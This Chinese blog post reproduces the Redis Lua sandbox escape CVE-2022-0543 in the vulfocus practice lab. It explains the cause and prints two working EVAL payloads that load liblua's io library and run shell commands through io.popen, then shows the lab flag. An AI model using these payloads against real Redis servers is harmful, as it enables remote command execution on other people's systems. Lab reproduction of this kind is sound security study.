本文主要是介绍vulfocus靶场之redis命令执行cve-2022-0543漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞:
Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。
Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令
1.工具方式: 使用Another Redis Desktop Manager
地址:AnotherRedisDesktopManager 发行版 - Gitee.com
输入网址和端口,点击OK
显示连接成功
输入攻击代码 payload即可:
查看当前id ,需要更改的地方红色字体:
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
查看ls /tmp
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /tmp", "r"); local res = f:read("*a"); f:close(); return res' 0
拿到flag:
flag-{bmh7129ae02-7f0e-4f16-bc44-a9c169855623}
这篇关于vulfocus靶场之redis命令执行cve-2022-0543漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!